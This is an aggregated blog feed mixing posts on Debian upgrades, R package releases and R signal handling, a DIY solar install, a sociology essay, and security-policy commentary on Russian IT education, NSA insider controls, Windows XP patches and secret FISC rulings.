  • Given talks at countless open source and developer events, both in Australia, and overseas. I’ve presented at OSCON, PyCons in five countries, and myriad other conferences. I’ve presented on a whole lot of technical topics, and I’ve recently started talking more about the community-level projects I’ve been involved with.
  • Designed, ran, and grew PyCon Australia’s outreach and inclusion programmes. Each year, PyCon Australia has offered upwards of $10,000 (around 10% of conference budget) in grants to people who otherwise wouldn’t be able to attend the conference: this is not just speakers, but people whose presence would improve the conference just by being there. I’ve led a team to assess applications for these grants, and lead our outreach efforts to make sure we find the right people to receive these grants.
  • Served as a council member for Linux Australia. Linux Australia is the peak body for Open Source communities in Australia, as well as underwriting the region’s more popular Open Source and Developer conferences. In particular, I led a project to design governance policies to help make sure the conferences we underwrite are properly budgeted and planned.

So, if you know of anything going at the moment, I’d love to hear about it. I’m reachable by e-mail (mail@chrisjrn.com) but you can also find me on Twitter (@chrisjrn), or if you really need to, LinkedIn.

TEDAn updated design for TED Talks

TED Talks design

It’s been a few years since the TED Talks video page was last updated, but a new design begins rolling out this week. The update aims to provide a simple, straightforward viewing experience for you while surfacing other ideas worth spreading that you might also like.

A few changes to highlight …

More talks to watch

Today there are about 2,500 TED Talks in the catalog, and each is unique. However, most of them are connected to other talks in some way — on similar topics, or given by the same speaker. Think of it as part of a conversation. That’s why, in our new design, it’s easier to see other talks you might be interested in. Those smart recommendations are shown along the right side of the screen.

As our library of talks grows, the updated design will help you discover the most relevant talks.

Beyond the video: More brain candy

Most ideas are rich in nuanced information far beyond what an 18 minute talk can contain. That’s why we collected deeper content around the idea for you to explore— like books by the speaker, articles relating to the talk, and ways to take action and get involved — in the Details section.

Many speakers provide annotations for viewers (now with clickable time codes that take you right to the relevant moment in the video) as well as their own resources and personal recommendations. You can find all of that extra content in the Footnotes and Reading list sections.

Transcripts, translations, and subtitling

Reaching a global community has always been a foundation of TED’s mission, so working to improve the experience for our non-English speaking viewers is an ongoing effort. This update gives you one-click access to our most requested subtitles (when available), displayed in their native endonyms. We’ve also improved the subtitles themselves, making the text easier for you to read across languages.

What’s next?

While there are strong visual differences, this update is but one mark in a series of improvements we plan on making for how you view TED Talks on TED.com. We’d appreciate your feedback to measure our progress and influence our future changes!


LongNowThe Nuclear Bunker Preserving Movie History

During the Cold War, this underground bunker in Culpeper, Virginia was where the government would have taken the president if a nuclear war broke out. Now, the Library of Congress is using it to preserve all manner of films, from Casablanca to Harry Potter. The oldest films were made on nitrate, a fragile and highly combustible film base that shares the same chemical compound as gunpowder. Great Big Story takes us inside the vault, and introduces us to archivist George Willeman, the man in charge of restoring and preserving the earliest (and most incendiary) motion pictures.

Krebs on SecurityWhy So Many Top Hackers Hail from Russia

Conventional wisdom says one reason so many hackers seem to hail from Russia and parts of the former Soviet Union is that these countries have traditionally placed a much greater emphasis than educational institutions in the West on teaching information technology in middle and high schools, and yet they lack a Silicon Valley-like pipeline to help talented IT experts channel their skills into high-paying jobs. This post explores the first part of that assumption by examining a breadth of open-source data.

The supply side of that conventional wisdom seems to be supported by an analysis of educational data from both the U.S. and Russia, which indicates there are several stark and important differences between how American students are taught and tested on IT subjects versus their counterparts in Eastern Europe.

computered

Compared to the United States there are quite a few more high school students in Russia who choose to specialize in information technology subjects. One way to measure this is to look at the number of high school students in the two countries who opt to take the advanced placement exam for computer science.

According to an analysis (PDF) by The College Board, in the ten years between 2005 and 2016 a total of 270,000 high school students in the United States opted to take the national exam in computer science (the “Computer Science Advanced Placement” exam).

Compare that to the numbers from Russia: A 2014 study (PDF) on computer science (called “Informatics” in Russia) by the Perm State National Research University found that roughly 60,000 Russian students register each year to take their nation’s equivalent to the AP exam — known as the “Unified National Examination.” Extrapolating that annual 60,000 number over ten years suggests that more than twice as many people in Russia — 600,000 — have taken the computer science exam at the high school level over the past decade.

In “A National Talent Strategy,” an in-depth analysis from Microsoft Corp. on the outlook for information technology careers, the authors warn that despite its critical and growing importance computer science is taught in only a small minority of U.S. schools. The Microsoft study notes that although there currently are just over 42,000 high schools in the United States, only 2,100 of them were certified to teach the AP computer science course in 2011.

A HEAD START

If more people in Russia than in America decide to take the computer science exam in secondary school, it may be because Russian students are required to study the subject beginning at a much younger age. Russia’s Federal Educational Standards (FES) mandate that informatics be compulsory in middle school, with any school free to choose to include it in their high school curriculum at a basic or advanced level.

“In elementary school, elements of Informatics are taught within the core subjects ‘Mathematics’ and ‘Technology,” the Perm University research paper notes. “Furthermore, each elementary school has the right to make [the] subject “Informatics” part of its curriculum.”

The core components of the FES informatics curriculum for Russian middle schools are the following:

1. Theoretical foundations
2. Principles of computer’s functioning
3. Information technologies
4. Network technologies
5. Algorithmization
6. Languages and methods of programming
7. Modeling
8. Informatics and Society

SECONDARY SCHOOL

There also are stark differences in how computer science/informatics is taught in the two countries, as well as the level of mastery that exam-takers are expected to demonstrate in their respective exams.

Again, drawing from the Perm study on the objectives in Russia’s informatics exam, here’s a rundown of what that exam seeks to test:

Block 1: “Mathematical foundations of Informatics”,
Block 2: “Algorithmization and programming”, and
Block 3: “Information and computer technology.”

The testing materials consist of three parts.

Part 1 is a multiple-choice test with four given options, and it covers all the blocks. Relatively little time is set aside to complete this part.

Part 2 contains a set of tasks of basic, intermediate and advanced levels of complexity. These require brief answers such as a number or a sequence of characteristics.

Part 3 contains a set of tasks of an even higher level of complexity than advanced. These tasks usually involve writing a detailed answer in free form.

According to the Perm study, “in 2012, part 1 contained 13 tasks; Part 2, 15 tasks; and Part 3, 4 tasks. The examination covers the key topics from the Informatics school syllabus. The tasks with detailed answers are the most labor intensive. These include tasks on the analysis of algorithms, drawing up computer programs, among other types. The answers are checked by the experts of regional examination boards based on standard assessment criteria.”

Image: Perm State National Research University, Russia.

Image: Perm State National Research University, Russia.

In the U.S., the content of the AP computer science exam is spelled out in this College Board document (PDF).

US Test Content Areas:

Computational Thinking Practices (P)

P1: Connecting Computing
P2: Creating Computational Artifacts
P3: Abstracting
P4: Analyzing Problems and Artifacts
P5: Communicating
P6: Collaborating

The Concept Outline:

Big Idea 1: Creativity
Big idea 2: Abstraction
Big Idea 3: Data and Information
Big Idea 4: Algorithms
Big idea 5: Programming
Big idea 6: The Internet
Big idea 7: Global Impact

ADMIRING THE PROBLEM

How do these two tests compare? Alan Paller, director of research for the SANS Institute — an information security education and training organization — says topics 2, 3, 4 and 6 in the Russian informatics curriculum above are the “basics” on which cybersecurity skills can be built, and they are present beginning in middle school for all Russian students.

“Very few middle schools teach this in the United States,” Paller said. “We don’t teach these topics in general and we definitely don’t test them. The Russians do and they’ve been doing this for the past 30 years. Which country will produce the most skilled cybersecurity people?”

Paller said the Russian curriculum virtually ensures kids have far more hands-on experience with computer programming and problem solving. For example, in the American AP test no programming language is specified and the learning objectives are:

“How are programs developed to help people and organizations?”
“How are programs used for creative expression?”
“How do computer programs implement algorithms?”
“How does abstraction make the development of computer programs possible?”
“How do people develop and test computer programs?”
“Which mathematical and logical concepts are fundamental to programming?”

“Notice there is almost no need to learn to program — I think they have to write one program (in collaboration with other students),” Paller wrote in an email to KrebsOnSecurity. “It’s like they’re teaching kids to admire it without learning to do it. The main reason that cyber education fails is that much of the time the students come out of school with almost no usable skills.”

THE WAY FORWARD

On the bright side, there are signs that computer science is becoming a more popular focus for U.S. high school students. According to the latest AP Test report (PDF) from the College Board, almost 58,000 Americans took the AP exam in computer science last year — up from 49,000 in 2015.

However, computer science still is far less popular than most other AP test subjects in the United States. More than a half million students opted for the English AP exam in 2016; 405,000 took English literature; almost 283,000 took AP government, while some 159,000 students went for an AP test called “Human Geography.”

A breakdown of subject specialization in the 2016 v. 2015 AP tests in the United States. Source: The College Board.

A breakdown of subject specialization in the 2016 v. 2015 AP tests in the United States. Source: The College Board.

This is not particularly good news given the dearth of qualified cybersecurity professionals available to employers. ISACA, a non-profit information security advocacy group, estimates there will be a global shortage of two million cyber security professionals by 2019. A report from Frost & Sullivan and (ISC)2 prognosticates there will be more than 1.5 million cybersecurity jobs unfilled by 2020.

The IT recruitment problem is especially acute for companies in the United States. Unable to find enough qualified cybersecurity professionals to hire here in the U.S., companies increasingly are counting on hiring foreigners who have the skills they’re seeking. However, the Trump administration in April ordered a full review of the country’s high-skilled immigration visa program, a step that many believe could produce new rules to clamp down on companies that hire foreigners instead of Americans.

Some of Silicon Valley’s biggest players are urging policymakers to adopt a more forward-looking strategy to solving the skills gap crisis domestically. In its National Talent Strategy report (PDF), Microsoft said it spends 83 percent of its worldwide R&D budget in the United States.

“But companies across our industry cannot continue to focus R&D jobs in this country if we cannot fill them here,” reads the Microsoft report. “Unless the situation changes, there is a growing probability that unfilled jobs will migrate over time to countries that graduate larger numbers of individuals with the STEM backgrounds that the global economy so clearly needs.”

Microsoft is urging U.S. policymakers to adopt a nationwide program to strengthen K-12 STEM education by recruiting and training more teachers to teach it. The software giant also says states should be given more funding to broaden access to computer science in high school, and that computer science learning needs to start much earlier for U.S. students.

“In the short-term this represents an unrealized opportunity for American job growth,” Microsoft warned. “In the longer term this may spur the development of economic competition in a field that the United States pioneered.”

Planet DebianJohn Goerzen: First Experiences with Stretch

I’ve done my first upgrades to Debian stretch at this point. The results have been overall good. On the laptop my kids use, I helped my 10-year-old do it, and it worked flawlessly. On my workstation, I got a kernel panic on boot. Hmm.

Unfortunately, my system has to use the nv drivers, which leaves me with an 80×25 text console. It took some finagling (break=init in grub, then manually insmoding the appropriate stuff based on modules.dep for nouveau), but finally I got a console so I could see what was breaking. It appeared that init was crashing because it couldn’t find liblz4. A little digging shows that liblz4 is in /usr, and /usr wasn’t mounted. I’ve filed the bug on systemd-sysv for this.

I run root on ZFS, and further digging revealed that I had datasets named like this:

  • tank/hostname-1/ROOT
  • tank/hostname-1/usr
  • tank/hostname-1/var

This used to be fine. The mountpoint property of the usr dataset put it at /usr without incident. But it turns out that this won’t work now, unless I set ZFS_INITRD_ADDITIONAL_DATASETS in /etc/default/zfs for some reason. So I renamed them so usr was under ROOT, and then the system booted.

Then I ran samba not liking something in my bind interfaces line (to be fair, it did still say eth0 instead of br0). rpcbind was failing in postinst, though a reboot seems to have helped that. More annoying was that I had trouble logging into my system because resolv.conf was left empty (despite dns-* entries in /etc/network/interfaces and the presence of resolvconf). I eventually repaired that, and found that it kept removing my “search” line. Eventually I removed resolvconf.

Then mariadb’s postinst was silently failing. I eventually discovered it was sending info to syslog (odd), and /etc/init.d/apparmor teardown let it complete properly. It seems like there may have been an outdated /etc/apparmor.d/cache/usr.sbin.mysql out there for some reason.

Then there was XFCE. I use it with xmonad, and the session startup was really wonky. I had to zap my sessions, my panel config, etc. and start anew. I am still not entirely sure I have it right, but I at do have a usable system now.

Planet DebianDirk Eddelbuettel: nanotime 0.2.0

A new version of the nanotime package for working with nanosecond timestamps just arrived on CRAN.

nanotime uses the RcppCCTZ package for (efficient) high(er) resolution time parsing and formatting up to nanosecond resolution, and the bit64 package for the actual integer64 arithmetic.

Thanks to a metric ton of work by Leonardo Silvestri, the package now uses S4 classes internally allowing for greater consistency of operations on nanotime objects.

Changes in version 0.2.0 (2017-06-22)

  • Rewritten in S4 to provide more robust operations (#17 by Leonardo)

  • Ensure tz="" is treated as unset (Leonardo in #20)

  • Added format and tz arguments to nanotime, format, print (#22 by Leonardo and Dirk)

  • Ensure printing respect options()$max.print, ensure names are kept with vector (#23 by Leonardo)

  • Correct summary() by defining names<- (Leonardo in #25 fixing #24)

  • Report error on operations that are meaningful for type; handled NA, NaN, Inf, -Inf correctly (Leonardo in #27 fixing #26)

We also have a diff to the previous version thanks to CRANberries. More details and examples are at the nanotime page; code, issue tickets etc at the GitHub repository.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

CryptogramNSA Insider Security Post-Snowden

According to a recently declassified report obtained under FOIA, the NSA's attempts to protect itself against insider attacks aren't going very well:

The N.S.A. failed to consistently lock racks of servers storing highly classified data and to secure data center machine rooms, according to the report, an investigation by the Defense Department's inspector general completed in 2016.

[...]

The agency also failed to meaningfully reduce the number of officials and contractors who were empowered to download and transfer data classified as top secret, as well as the number of "privileged" users, who have greater power to access the N.S.A.'s most sensitive computer systems. And it did not fully implement software to monitor what those users were doing.

In all, the report concluded, while the post-Snowden initiative -- called "Secure the Net" by the N.S.A. -- had some successes, it "did not fully meet the intent of decreasing the risk of insider threats to N.S.A. operations and the ability of insiders to exfiltrate data."

Marcy Wheeler comments:

The IG report examined seven of the most important out of 40 "Secure the Net" initiatives rolled out since Snowden began leaking classified information. Two of the initiatives aspired to reduce the number of people who had the kind of access Snowden did: those who have privileged access to maintain, configure, and operate the NSA's computer systems (what the report calls PRIVACs), and those who are authorized to use removable media to transfer data to or from an NSA system (what the report calls DTAs).

But when DOD's inspectors went to assess whether NSA had succeeded in doing this, they found something disturbing. In both cases, the NSA did not have solid documentation about how many such users existed at the time of the Snowden leak. With respect to PRIVACs, in June 2013 (the start of the Snowden leak), "NSA officials stated that they used a manually kept spreadsheet, which they no longer had, to identify the initial number of privileged users." The report offered no explanation for how NSA came to no longer have that spreadsheet just as an investigation into the biggest breach thus far at NSA started. With respect to DTAs, "NSA did not know how many DTAs it had because the manually kept list was corrupted during the months leading up to the security breach."

There seem to be two possible explanations for the fact that the NSA couldn't track who had the same kind of access that Snowden exploited to steal so many documents. Either the dog ate their homework: Someone at NSA made the documents unavailable (or they never really existed). Or someone fed the dog their homework: Some adversary made these lists unusable. The former would suggest the NSA had something to hide as it prepared to explain why Snowden had been able to walk away with NSA's crown jewels. The latter would suggest that someone deliberately obscured who else in the building might walk away with the crown jewels. Obscuring that list would be of particular value if you were a foreign adversary planning on walking away with a bunch of files, such as the set of hacking tools the Shadow Brokers have since released, which are believed to have originated at NSA.

Read the whole thing. Securing against insiders, especially those with technical access, is difficult, but I had assumed the NSA did more post-Snowden.

Worse Than FailureI Need More Space

Beach litter, Winterton Dunes - geograph.org.uk - 966905

Shawn W. was a newbie support tech at a small company. Just as he was beginning to familiarize himself with its operational quirks, he got a call from Jim: The Big Boss.

Dread seized Shawn. Aside from a handshake on Interview Day, the only "interaction" he'd had with Jim thus far was overhearing him tear into a different support rep about having to deal with "complicated computer crap" like changing passwords. No doubt, this call was bound to be a clinic in saintly patience.

"Tech Support," Shawn greeted. "How may—?"

"I'm out of space and I need more!" Jim barked over the line.

"Oh." Shawn mentally geared up for a memory or hard drive problem. "Did you get a warning or error mes—?"

"Just get up here and bring some more space with you!" Jim hung up.

"Oh, boy," Shawn muttered to himself.

Deciding that he was better off diagnosing the problem firsthand, Shawn trudged upstairs to Jim's office. To his pleasant surprise, he found it empty. He sank into the cushy executive-level chair. Jim hadn't been away long enough for any screensavers or lock screens to pop up, so Shawn had free rein to examine the machine.

There wasn't much to find. The only program running was a web browser, with a couple of tabs open to ESPN.com and an investment portfolio. The hardware itself was fairly new. CPU, memory, hard drive all looked fine.

"See, I'm out of space. Did you bring me more?"

Shawn glanced up to find Jim barreling toward him, steaming mug of coffee in hand. He braced himself as though facing down an oncoming freight train. "I'm not sure I see the problem yet. Can you show me what you were doing when you noticed you needed more space?"

Jim elbowed his way over to the mouse, closed the browser, then pointed to the monitor. "There! Can't you see I'm out of space?"

Indeed, Jim's desktop was full. So many shortcuts, documents, widgets, and other icons crowded the screen that the tropical desktop background was barely recognizable as such.

While staring at what resembled the aftermath of a Category 5 hurricane, Shawn debated his response. "OK, I see what you mean. Let's see if we can—"

"Can't you just get me more screen?" Jim pressed.

More screen? "You mean another monitor?" Shawn asked. "Well, yes, I could add a second monitor if you want one, but we could also organize your desktop a little and—"

"Good, get me one of those! Don't touch my icons!" Jim shooed Shawn away like so much lint. "Get out of my chair so I can get back to work."

A short while later, Shawn hooked up a second monitor to Jim's computer. This prompted a huge and unexpected grin from the boss. "I like you, you get things done. Those other guys would've taken a week to get me more space!"

Shawn nodded while stifling a snort. "Let me know if you need anything else."

Once Jim had left for the day, Shawn swung past the boss' office out of morbid curiosity. Jim had already scattered a few dozen shortcuts across his new real estate. Another lovely vacation destination was about to endure a serious littering problem.

[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

Planet DebianNorbert Preining: Signal handling in R

Recently I have been programming quite a lot in R, and today stumbled over the problem to implement a kind of monitoring loop in R. Typically that would be a infinite loop with sleep calls, but I wanted to allow for waking up from the sleep via sending UNIX style signals, in particular SIGINT. After some searching I found Beyond Exception Handling: Conditions and Restarts from the Advanced R book. But it didn’t really help me a lot to program an interrupt handler.

My requirements were:

  • an interruption of the work-part should be immediately restarted
  • an interruption of the sleep-part should go immediately into the work-part

Unfortunately it seems not to be possible to ignore interrupts at all from with the R code. The best one can do is install interrupt handlers and try to repeat the code which was executed while the interrupt happened. This is what I tried to implement with the following code below. I still have to digest the documentation about conditions and restarts, and play around a lot, but at least this is an initial working version.

workfun <- function() {
  i <- 1
  do_repeat <- FALSE
  while (TRUE) {
    message("begin of the loop")
    withRestarts(
      {
        # do all the work here
        cat("Entering work part i =", i, "\n");
        Sys.sleep(10)
        i <- i + 1
        cat("finished work part\n")
      }, 
      gotSIG = function() { 
        message("interrupted while working, restarting work part")
        do_repeat <<- TRUE
        NULL
      }
    )
    if (do_repeat) {
      cat("restarting work loop\n")
      do_repeat <- FALSE
      next
    } else {
      cat("between work and sleep part\n")
    }
    withRestarts(
      {
        # do the sleep part here
        cat("Entering sleep part i =", i, "\n")
        Sys.sleep(10)
        i <- i + 1
        cat("finished sleep part\n")
      }, 
      gotSIG = function() {
        message("got work to do, waking up!")
        NULL
      }
    )
    message("end of the loop")
  }
}

cat("Current process:", Sys.getpid(), "\n");

withCallingHandlers({
    workfun()
  },
  interrupt = function(e) {
    invokeRestart("gotSIG")
  })

While not perfect, I guess I have to live with this method for now.

CryptogramCeramic Knife Used in Israel Stabbing

I have no comment on the politics of this stabbing attack, and only note that the attacker used a ceramic knife -- that will go through metal detectors.

I have used a ceramic knife in the kitchen. It's sharp.

EDITED TO ADD (6/22): It looks like the knife had nothing to do with the attack discussed in the article.

Don MartiStuff I'm thankful for

I'm thankful that the sewing machine was invented a long time ago, not today. If the sewing machine were invented today, most sewing tutorials would be twice as long, because all the thread would come in proprietary cartridges, and you would usually have to hack the cartridge to get the type of thread you need in a cartridge that works with your machine.

Don Marti1. Write open source. 2. ??? 3. PROFIT

Studies keep showing that open source developers get paid more than people who develop software but do not contribute to open source.

Good recent piece: Tabs, spaces and your salary - how is it really? by Evelina Gabasova.

But why?

Is open source participation a way to signal) that you have skills and are capable of cooperation with others?

Is open source a way to build connections and social capital so that you have more awareness of new job openings and can more easily move to a higher-paid position?

Does open source participation just increase your skills so that you do better work and get paid more for it?

Are open source codebases a complementary good to open source maintenance programming, so that a lower price for access to the codebase tends to drive up the price for maintenance programming labor?

Is "we hire open source people" just an excuse for bias, since the open source scene at least in the USA is less diverse than the general pool of programming job applicants?

Planet DebianDirk Eddelbuettel: RcppCCTZ 0.2.3 (and 0.2.2)

A new minor version 0.2.3 of RcppCCTZ is now on CRAN.

RcppCCTZ uses Rcpp to bring CCTZ to R. CCTZ is a C++ library for translating between absolute and civil times using the rules of a time zone. In fact, it is two libraries. One for dealing with civil time: human-readable dates and times, and one for converting between between absolute and civil times via time zones. The RcppCCTZ page has a few usage examples and details.

This version ensures that we set the TZDIR environment variable correctly on the old dreaded OS that does not come with proper timezone information---an issue which had come up while preparing the next (and awesome, trust me) release of nanotime. It also appears that I failed to blog about 0.2.2, another maintenance release, so changes for both are summarised next.

Changes in version 0.2.3 (2017-06-19)

  • On Windows, the TZDIR environment variable is now set in .onLoad()

  • Replaced init.c with registration code inside of RcppExports.cpp thanks to Rcpp 0.12.11.

Changes in version 0.2.2 (2017-04-20)

  • Synchronized with upstream CCTZ

  • The time_point object is instantiated explicitly for nanosecond use which appears to be required on macOS

We also have a diff to the previous version thanks to CRANberries. More details are at the RcppCCTZ page; code, issue tickets etc at the GitHub repository.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

,

Planet DebianJoey Hess: DIY professional grade solar panel installation

I've installed 1 kilowatt of solar panels on my roof, using professional grade eqipment. The four panels are Astronergy 260 watt panels, and they're mounted on IronRidge XR100 rails. Did it all myself, without help.

house with 4 solar panels on roof

I had three goals for this install:

  1. Cheap but sturdy. Total cost will be under $2500. It would probably cost at least twice as much to get a professional install, and the pros might not even want to do such a small install.
  2. Learn the roof mount system. I want to be able to add more panels, remove panels when working on the roof, and understand everything.
  3. Make every day a sunny day. With my current solar panels, I get around 10x as much power on a sunny day as a cloudy day, and I have plenty of power on sunny days. So 10x the PV capacity should be a good amount of power all the time.

My main concerns were, would I be able to find the rafters when installing the rails, and would the 5x3 foot panels be too unweildly to get up on the roof by myself.

I was able to find the rafters, without needing a stud finder, after I removed the roof's vent caps, which exposed the rafters. The shingles were on straight enough that I could follow the lines down and drilled into the rafter on the first try every time. And I got the rails on spaced well and straight, although I could have spaced the FlashFeet out better (oops).

My drill ran out of juice half-way, and I had to hack it to recharge on solar power, but that's another story. Between the learning curve, a lot of careful measurement, not the greatest shoes for roofing, and waiting for recharging, it took two days to get the 8 FlashFeet installed and the rails mounted.

Taking a break from that and swimming in the river, I realized I should have been wearing my water shoes on the roof all along. Super soft and nubbly, they make me feel like a gecko up there! After recovering from an (unrelated) achilles tendon strain, I got the panels installed today.

Turns out they're not hard to handle on the roof by myself. Getting them up a ladder to the roof by yourself would normally be another story, but my house has a 2 foot step up from the back retaining wall to the roof, and even has a handy grip beam as you step up.

roof next to the ground with a couple of cinderblock steps

The last gotcha, which I luckily anticipated, is that panels will slide down off the rails before you can get them bolted down. This is where a second pair of hands would have been most useful. But, I macguyvered a solution, attaching temporary clamps before bringing a panel up, that stopped it sliding down while I was attaching it.

clamp temporarily attached to side of panel

I also finished the outside wiring today. Including the one hack of this install so far. Since the local hardware store didn't have a suitable conduit to bring the cables off the roof, I cobbled one together from pipe, with foam inserts to prevent chafing.

some pipe with 5 wires running through it, attached to the side of the roof

While I have 1 kilowatt of power on my roof now, I won't be able to use it until next week. After ordering the upgrade, I realized that my old PWM charge controller would be able to handle less than half the power, and to get even that I would have needed to mount the fuse box near the top of the roof and run down a large and expensive low-voltage high-amperage cable, around OO AWG size. Instead, I'll be upgrading to a MPPT controller, and running a single 150 volt cable to it.

Then, since the MPPT controller can only handle 1 kilowatt when it's converting to 24 volts, not 12 volts, I'm gonna have to convert the entire house over from 12V DC to 24V DC, including changing all the light fixtures and rewiring the battery bank...

CryptogramIs Continuing to Patch Windows XP a Mistake?

Last week, Microsoft issued a security patch for Windows XP, a 16-year-old operating system that Microsoft officially no longer supports. Last month, Microsoft issued a Windows XP patch for the vulnerability used in WannaCry.

Is this a good idea? This 2014 essay argues that it's not:

The zero-day flaw and its exploitation is unfortunate, and Microsoft is likely smarting from government calls for people to stop using Internet Explorer. The company had three ways it could respond. It could have done nothing­ -- stuck to its guns, maintained that the end of support means the end of support, and encouraged people to move to a different platform. It could also have relented entirely, extended Windows XP's support life cycle for another few years and waited for attrition to shrink Windows XP's userbase to irrelevant levels. Or it could have claimed that this case is somehow "special," releasing a patch while still claiming that Windows XP isn't supported.

None of these options is perfect. A hard-line approach to the end-of-life means that there are people being exploited that Microsoft refuses to help. A complete about-turn means that Windows XP will take even longer to flush out of the market, making it a continued headache for developers and administrators alike.

But the option Microsoft took is the worst of all worlds. It undermines efforts by IT staff to ditch the ancient operating system and undermines Microsoft's assertion that Windows XP isn't supported, while doing nothing to meaningfully improve the security of Windows XP users. The upside? It buys those users at best a few extra days of improved security. It's hard to say how that was possibly worth it.

This is a hard trade-off, and it's going to get much worse with the Internet of Things. Here's me:

The security of our computers and phones also comes from the fact that we replace them regularly. We buy new laptops every few years. We get new phones even more frequently. This isn't true for all of the embedded IoT systems. They last for years, even decades. We might buy a new DVR every five or ten years. We replace our refrigerator every 25 years. We replace our thermostat approximately never. Already the banking industry is dealing with the security problems of Windows 95 embedded in ATMs. This same problem is going to occur all over the Internet of Things.

At least Microsoft has security engineers on staff that can write a patch for Windows XP. There will be no one able to write patches for your 16-year-old thermostat and refrigerator, even assuming those devices can accept security patches.

Planet DebianReproducible builds folks: Reproducible Builds: week 112 in Stretch cycle

Here's what happened in the Reproducible Builds effort between Sunday June 11 and Saturday June 17 2017:

Upcoming events

Upstream patches and bugs filed

Reviews of unreproducible packages

1 package review has been added, 19 have been updated and 2 have been removed in this week, adding to our knowledge about identified issues.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (1)
  • Edmund Grimley Evans (1)

diffoscope development

tests.reproducible-builds.org

As you might have noticed, Debian stretch was released last week. Since then, Mattia and Holger renamed our testing suite to stretch and added a buster suite so that we keep our historic results for stretch visible and can continue our development work as usual. In this sense, happy hacking on buster; may it become the best Debian release ever and hopefully the first reproducible one!

  • Vagrant Cascadian:
  • Valerie Young: Add highlighting in navigation for the new nodes health pages.
  • Mattia Rizzolo:
    • Do not dump database ACL in the backups.
    • Deduplicate SSLCertificateFile directive into the common-directives-ssl macro
    • Apache: t.r-b.o: redirect /testing/ to /stretch/
    • db: s/testing/stretch/g
    • Start adding code to test buster...
  • Holger Levsen:
    • Update README.infrastructure to explain who has root access where.
    • reproducible_nodes_info.sh: correctly recognize zero builds per day.
    • Add build nodes health overview page, then split it in three: health overview, daily munin graphs and weekly munin graphs.
    • reproducible_worker.sh: improve handling of systemctl timeouts.
    • reproducible_build_service: sleep less and thus restart failed workers sooner.
    • Replace ftp.(de|uk|us).debian.org with deb.debian.org everywhere.
    • Performance page: also show local problems with _build_service.sh (which are autofixed after a maximum of 133.7 minutes).
    • Rename nodes_info job to html_nodes_info.
    • Add new node health check jobs, split off from maintenance jobs, run every 15 minutes.
      • Add two new checks: 1. for correct future (2019 is incorrect atm, and we sometimes got that). 2.) for writeable /tmp (sometimes happens on borked armhf nodes).
    • Add jobs for testing buster.
    • s/testing/stretch/g in all the code.
    • Finish the code to deal with buster.
    • Teach jessie and Ubuntu 16.04 how to debootstrap buster.

Axel Beckert is currently in the process of setting up eight LeMaker HiKey960 boards. These boards were sponsored by Hewlett Packard Enterprise and will be hosted by the SOSETH students association at ETH Zurich. Thanks to everyone involved here and also thanks to Martin Michlmayr and Steve Geary who initiated getting these boards to us.

Misc.

This week's edition was written by Chris Lamb, Holger Levsen & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Sociological ImagesOn “voluntary conformism,” or how we use our freedom to fit in

Originally posted at Montclair Socioblog.

“Freedom of opinion does not exist in America,” said DeTocqueville 250 years ago. He might have held the same view today.

But how could a society that so values freedom and individualism be so demanding of conformity?  I had blogged about this in 2010 with references to old sitcoms, but for my class this semester I needed something more recent. Besides, Cosby now carries too much other baggage. ABC’s “black-ish”* came to the rescue.

The idea I was offering in class was, first, that our most cherished American values can conflict with one another. For example, our desire for family-like community can clash with our value on independence and freedom. Second, the American solution to this conflict between individual and group is often what Claude Fischer calls “voluntarism.”  We have freedom – you can voluntarily choose which groups to belong to. But once you choose to be a member, you have to conform.  The book I had assigned my class (My Freshman Year by Rebekah Nathan*) uses the phrase “voluntary conformism.”

In a recent episode of “black-ish,” the oldest daughter, Zoey, must choose which college to go to. She has been accepted at NYU, Miami, Vanderbilt, and Southern Cal. She leans heavily towards NYU, but her family, especially her father Dre, want her to stay close to home. The conflict is between Family – family togetherness, community – and Independence. If Zoey goes to NYU, she’ll be off on her own; if she stays in LA, she’ll be just a short drive from her family. New York also suggests values on Achievement, Success, even Risk-taking (“If I can make it there” etc.)

Zoey decides on NYU, and her father immediately tries to undermine that choice, reminding her of how cold and dangerous it will be. It’s typical sitcom-dad buffonery, and his childishness tips us off that this position, imposing his will, is the wrong one. Zoey, acting more mature, simply goes out and buys a bright red winter coat.

The argument for Independence, Individual Choice, and Success is most clearly expressed by Pops (Dre’s father, who lives with them), and it’s the turning point in the show. Dre and his wife are complaining about the kids growing up too fast. Pops says, “Isn’t this what you wanted? Isn’t this why you both worked so hard — movin’ to this White-ass neighborhood, sendin’ her to that White-ass school so she could have all these White-ass opportunities? Let. Her. Go.”

That should be the end of it. The final scene should be the family bidding a tearful goodbye to Zoey at LAX. But a few moments later, we see Zoey talking to her two younger siblings (8-year old twins – Jack and Diane). They remind her of how much family fun they have at holidays. Zoey has to tell them that New York is far, so she won’t be coming back till Christmas – no Thanksgiving, no Halloween.

Jack reminds her about the baby that will arrive soon. “He won’t even know you.”

In the next scene, Zoey walks into her parents room carrying the red winter coat. “I need to return this.”

“Wrong size?” asks her father.

“Wrong state.”

She’s going to stay in LA and go to USC.

Over a half-century ago, David McClelland wrote that a basic but unstated tenet of American culture is: “I want to freely choose to do what others expect me to do.” Zoey has chosen to do what others want her to do – but she has made that individual choice independently. It’s “voluntary conformism,” and it’s the perfect American solution (or at least the perfect American sitcom solution).

* For those totally unfamiliar with the show, the premise is this: Dre Johnson, a Black man who grew up in a working-class Black neighborhood of LA, has become a well-off advertising man, married a doctor (her name is Rainbow, or usually Bow), and moved to a big house in an upscale neighborhood. They have four children, and the wife is pregnant with a fifth.

Jay Livingston is the chair of the Sociology Department at Montclair State University. You can follow him at Montclair SocioBlog or on Twitter.

(View original at https://thesocietypages.org/socimages)

CryptogramThe Dangers of Secret Law

Last week, the Department of Justice released 18 new FISC opinions related to Section 702 as part of an EFF FOIA lawsuit. (Of course, they don't mention EFF or the lawsuit. They make it sound as if it was their idea.)

There's probably a lot in these opinions. In one Kafkaesque ruling, a defendant was denied access to the previous court rulings that were used by the court to decide against it:

...in 2014, the Foreign Intelligence Surveillance Court (FISC) rejected a service provider's request to obtain other FISC opinions that government attorneys had cited and relied on in court filings seeking to compel the provider's cooperation.

[...]

